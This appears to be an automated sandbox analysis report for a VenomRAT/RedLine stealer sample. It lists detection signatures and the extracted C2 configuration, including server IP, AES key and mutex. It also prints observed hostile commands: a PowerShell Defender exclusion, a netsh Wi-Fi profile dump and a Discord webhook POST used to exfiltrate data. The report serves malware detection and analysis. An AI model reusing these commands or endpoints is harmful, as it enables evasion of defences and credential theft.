10.2.svchost.exe.1d540000.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x96fb5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x97027:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x970b1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x97143:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x971ad:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x9721f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x972b5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x97345:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
10.2.svchost.exe.1d540000.7.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
10.2.svchost.exe.1d540000.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.svchost.exe.1d540000.7.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
10.2.svchost.exe.1d540000.7.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x951b5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x95227:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x952b1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x95343:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x953ad:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x9541f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x954b5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x95545:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Click to see the 27 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\VzhY4BcvBH.exe, ProcessId: 2608, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\system32.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\system32.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VzhY4BcvBH.exe", ParentImage: C:\Users\user\Desktop\VzhY4BcvBH.exe, ParentProcessId: 2608, ParentProcessName: VzhY4BcvBH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\system32.exe', ProcessId: 6180, ProcessName: powershell.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\VzhY4BcvBH.exe", ParentImage: C:\Users\user\Desktop\VzhY4BcvBH.exe, ParentProcessId: 2608, ParentProcessName: VzhY4BcvBH.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 5004, ProcessName: svchost.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\system32.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\system32.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VzhY4BcvBH.exe", ParentImage: C:\Users\user\Desktop\VzhY4BcvBH.exe, ParentProcessId: 2608, ParentProcessName: VzhY4BcvBH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\system32.exe', ProcessId: 6180, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\VzhY4BcvBH.exe", ParentImage: C:\Users\user\Desktop\VzhY4BcvBH.exe, ParentProcessId: 2608, ParentProcessName: VzhY4BcvBH.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 5004, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\system32.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\system32.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VzhY4BcvBH.exe", ParentImage: C:\Users\user\Desktop\VzhY4BcvBH.exe, ParentProcessId: 2608, ParentProcessName: VzhY4BcvBH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\system32.exe', ProcessId: 6180, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\VzhY4BcvBH.exe", ParentImage: C:\Users\user\Desktop\VzhY4BcvBH.exe, ParentProcessId: 2608, ParentProcessName: VzhY4BcvBH.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 5004, ProcessName: svchost.exe

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 5004, ParentProcessName: svchost.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 4956, ProcessName: cmd.exe

Suricata Signatures

ET MALWARE Observed Malicious SSL Cert (VenomRAT)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-27T12:17:24.642978+0100	2052267	1	Domain Observed Used for C2 Detected	212.87.215.19	1602	192.168.2.5	49726	TCP

ET MALWARE RedLine Stealer - CheckConnect Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-27T12:17:15.609491+0100	2045000	1	Malware Command and Control Activity Detected	212.87.215.19	37552	192.168.2.5	49705	TCP

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-27T12:17:21.092325+0100	2046056	1	A Network Trojan was detected	212.87.215.19	37552	192.168.2.5	49705	TCP

ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-27T12:17:21.092325+0100	2045001	1	Malware Command and Control Activity Detected	212.87.215.19	37552	192.168.2.5	49705	TCP

ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-27T12:17:24.642978+0100	2842478	1	Malware Command and Control Activity Detected	212.87.215.19	1602	192.168.2.5	49726	TCP
2024-11-27T12:17:35.817170+0100	2842478	1	Malware Command and Control Activity Detected	212.87.215.19	1602	192.168.2.5	49752	TCP
2024-11-27T12:17:38.625316+0100	2842478	1	Malware Command and Control Activity Detected	212.87.215.19	1602	192.168.2.5	49760	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-27T12:17:46.793195+0100	2803305	3	Unknown Traffic	192.168.2.5	49774	104.16.185.241	80	TCP

ETPRO MALWARE RedLine - CheckConnect Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-27T12:17:10.480731+0100	2849662	1	Malware Command and Control Activity Detected	192.168.2.5	49705	212.87.215.19	37552	TCP

ETPRO MALWARE RedLine - EnvironmentSettings Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-27T12:17:15.915127+0100	2849351	1	Malware Command and Control Activity Detected	192.168.2.5	49705	212.87.215.19	37552	TCP

ETPRO MALWARE RedLine - GetUpdates Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-27T12:17:24.590479+0100	2848200	1	Malware Command and Control Activity Detected	192.168.2.5	49731	212.87.215.19	37552	TCP

ETPRO MALWARE RedLine - SetEnvironment Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-27T12:17:21.385268+0100	2849352	1	Malware Command and Control Activity Detected	192.168.2.5	49725	212.87.215.19	37552	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: VzhY4BcvBH.exe

Avira: detected

Found malware configuration

Source: 0000000A.00000002.4478728762.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: VenomRAT {"Server": "212.87.215.19", "Port": "1602", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.3", "MutexName": "xtqapdqeqwwlkdcvcat", "Autorun": "false", "Group": "false"}
Source: 5.0.system32.exe.870000.0.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["212.87.215.19:37552"], "Bot Id": "kek"}
Source: 10.0.svchost.exe.160000.0.unpack	Malware Configuration Extractor: AsyncRAT {"Server": "212.87.215.19", "Ports": "1602", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.3", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "AdAsra9KWXPe1YjHD16oql7ML46APrSS", "Mutex": "xtqapdqeqwwlkdcvcat", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "ServerSignature": "a25OqTbzkOXasU77CSOC87QNxJIQZMKhBFjEl9h42mhrUFbh5/mOMWZQEnwmryHp46QvSMtP5Kfo/5azQtYRPyNO2cXQYghW14RfBpDVeX6CedrKJoaDXzAHw9K6OGdPBlnun9EZYqHGgqiDTWKXQRaU1DXQ36b4TETwWsr7pAY=", "BDOS": "null", "External_config_on_Pastebin": "false"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\svchost.exe

ReversingLabs: Detection: 95%

Multi AV Scanner detection for submitted file

Source: VzhY4BcvBH.exe

ReversingLabs: Detection: 71%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: VzhY4BcvBH.exe

Joe Sandbox ML: detected

Source: VzhY4BcvBH.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.5:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.5:49792 version: TLS 1.2

Source: VzhY4BcvBH.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: root\??\C:\Windows\System.pdb source: svchost.exe, 0000000A.00000002.4519333323.000000001C928000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: svchost.exe, 0000000A.00000002.4519333323.000000001C928000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: svchost.exe, 0000000A.00000002.4516725735.000000001C800000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: svchost.exe, 0000000A.00000002.4517181240.000000001C85F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: costura.dotnetzip.pdb.compressed source: svchost.exe, 0000000A.00000002.4478728762.0000000002601000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: %costura.messagepacklib.pdb.compressed source: svchost.exe, 0000000A.00000002.4478728762.0000000002601000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Recovery.pdb source: svchost.exe, 0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: c:\Development\Releases\Json\Working\Newtonsoft.Json\Src\Newtonsoft.Json\obj\Release\Net40\Newtonsoft.Json.pdbx source: svchost.exe, 0000000A.00000002.4478728762.000000000296F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.4521155331.000000001D040000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.4502281344.0000000012612000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: svchost.exe, 0000000A.00000002.4526492924.000000001D660000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: c:\Development\Releases\Json\Working\Newtonsoft.Json\Src\Newtonsoft.Json\obj\Release\Net40\Newtonsoft.Json.pdb source: svchost.exe, 0000000A.00000002.4478728762.000000000296F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.4521155331.000000001D040000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.4502281344.0000000012612000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: svchost.exe, 0000000A.00000002.4519333323.000000001C928000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: *Win32_VideoController\??\C:\Windows\dll\System.pdb source: svchost.exe, 0000000A.00000002.4519333323.000000001C928000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\MessagePack\bin\Release\MessagePackLib.pdb source: svchost.exe, 0000000A.00000002.4508792580.000000001AD90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: svchost.exe, 0000000A.00000002.4516725735.000000001C800000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: svchost.exe, 0000000A.00000002.4517181240.000000001C85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.4517996378.000000001C87E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: FPS_BROWSER_USER_PROFILE_STRING=Default\??\C:\Windows\symbols\dll\System.pdb source: svchost.exe, 0000000A.00000002.4516725735.000000001C800000.00000004.00000020.00020000.00000000.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.5:49705 -> 212.87.215.19:37552
Source: Network traffic	Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 212.87.215.19:37552 -> 192.168.2.5:49705
Source: Network traffic	Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.5:49705 -> 212.87.215.19:37552
Source: Network traffic	Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 212.87.215.19:37552 -> 192.168.2.5:49705
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 212.87.215.19:37552 -> 192.168.2.5:49705
Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 212.87.215.19:1602 -> 192.168.2.5:49726
Source: Network traffic	Suricata IDS: 2052265 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (VenomRAT) : 212.87.215.19:1602 -> 192.168.2.5:49726
Source: Network traffic	Suricata IDS: 2052267 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (VenomRAT) : 212.87.215.19:1602 -> 192.168.2.5:49726
Source: Network traffic	Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.5:49725 -> 212.87.215.19:37552
Source: Network traffic	Suricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.5:49731 -> 212.87.215.19:37552
Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 212.87.215.19:1602 -> 192.168.2.5:49752
Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 212.87.215.19:1602 -> 192.168.2.5:49760

System process connects to network (likely due to code injection or exploit)

Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 162.159.136.232 443
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 208.95.112.1 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.16.185.241 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 172.67.196.114 443
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 212.87.215.19 1602

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 212.87.215.19:37552

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 212.87.215.19 ports 37552,1602,2,3,5,7

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 37552
Source: unknown	Network traffic detected: HTTP traffic on port 37552 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 37552
Source: unknown	Network traffic detected: HTTP traffic on port 37552 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 37552
Source: unknown	Network traffic detected: HTTP traffic on port 37552 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 37552
Source: unknown	Network traffic detected: HTTP traffic on port 37552 -> 49731

Source: global traffic

TCP traffic: 192.168.2.5:49705 -> 212.87.215.19:37552

Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5Xnk3vl2YBdVD37L0qTWnM?wait=true HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: discord.comContent-Length: 2223Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 212.87.215.19:37552Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 212.87.215.19:37552Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 212.87.215.19:37552Content-Length: 993488Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 212.87.215.19:37552Content-Length: 993480Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 162.159.136.232 162.159.136.232

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: icanhazip.com
Source: unknown	DNS query: name: ip-api.com

Source: Network traffic

Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49774 -> 104.16.185.241:80

Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19
Source: unknown	TCP traffic detected without corresponding DNS query: 212.87.215.19

Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com

Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: api.ip.sb
Source: global traffic	DNS traffic detected: DNS query: icanhazip.com
Source: global traffic	DNS traffic detected: DNS query: 158.157.4.0.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: api.mylnikov.org
Source: global traffic	DNS traffic detected: DNS query: discord.com

Source: unknown

HTTP traffic detected: POST /api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5Xnk3vl2YBdVD37L0qTWnM?wait=true HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: discord.comContent-Length: 2223Expect: 100-continueConnection: Keep-Alive

